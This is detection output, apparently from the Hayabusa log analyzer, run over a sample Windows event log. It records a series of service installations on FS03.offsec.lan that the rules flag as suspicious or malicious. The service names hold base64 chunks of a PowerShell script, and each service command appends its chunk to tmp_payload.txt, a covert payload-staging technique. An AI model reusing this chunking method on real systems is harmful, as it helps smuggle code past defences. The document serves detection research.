+2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:57.053 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: T1JfTE9HICJVbmFibGUgdG8gU3VnZ2VzdCBQcm9maWxlIg0KICAgICAgICAgICAgDQogICAgICAgICAgICBleGl0DQogICAgICAgICB9ICAgICAgICANCiANCiAgICAgICAgIA0KICAgICAgICAgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg71"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:58.514 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvZ1N0YXRzQW5kSW5mbw0KDQogICAgDQogICAgfQ0KDQogICAgY2F0Y2ggew0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJVbmFibGUgdG8gZ2V0IHByb2ZpbGUgc3VnZ2VzdGlvbiIN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg72"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:16:59.975 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Cg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg73"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:01.428 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: INCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCiMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg74"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:02.892 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIHRlc3QgY2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg75"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:04.364 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9ubmVjdGlvbg0KDQojQHBhcmFtICRDcmVkICAgICAtPiAgVGhlIEV2ZW50IExvZw0KI0BwYXJhbSAkQ29tcHV0ZXIgLT4gIFRoZSBhdmcgZXZlbnRzIHBlciBzZWNvbmQgZm9yIHRoZSBnaXZlbiBs | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg76"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:05.817 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg77"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:07.256 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lvbiBUZXN0LUhvc3RDb25uZWN0aW9uIHsgcGFyYW0oJENvbXB1dGVyKSAgICANCg0KICAgIHRyeSB7DQoNCiAgICAgICAgaWYgKChUZXN0LUNvbm5lY3Rpb24gLUNvbXB1dGVyTmFtZSAkQ29tcHV0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg78"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:08.709 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZXIgLWNvdW50IDEgLXF1aWV0KSkgew0KDQogICAgICAgICAgICByZXR1cm4gJHRydWUNCiAgICAgICAgfQ0KDQogICAgICAgIGVsc2Ugew0KDQoNCiAgICAgICAgICAgIFdyaXRlLUxvZyAkRVJST1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg79"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:10.219 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: JfTE9HICJVbmFibGUgdG8gY29udGFjdCAkQ29tcHV0ZXIuIFBsZWFzZSB2ZXJpZnkgaXRzIG5ldHdvcmsgY29ubmVjdGl2aXR5IGFuZCB0cnkgYWdhaW4iDQoNCiAgICAgICAgICAgICRHbG9iYWw6 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg80"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:11.712 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q29ubmVjdGlvbklzc3VlcyA9ICRHbG9iYWw6Q29ubmVjdGlvbklzc3VlcyArIDENCg0KICAgICAgICAgICAgcmV0dXJuICRmYWxzZQ0KICAgICAgICB9ICAgICAgICANCiAgICB9DQoNCiAgICBjYX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg81"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
+2021-11-03 17:17:13.157 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RjaCB7DQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSBjb25lY3QgdG8gSG9zdCINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg82"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
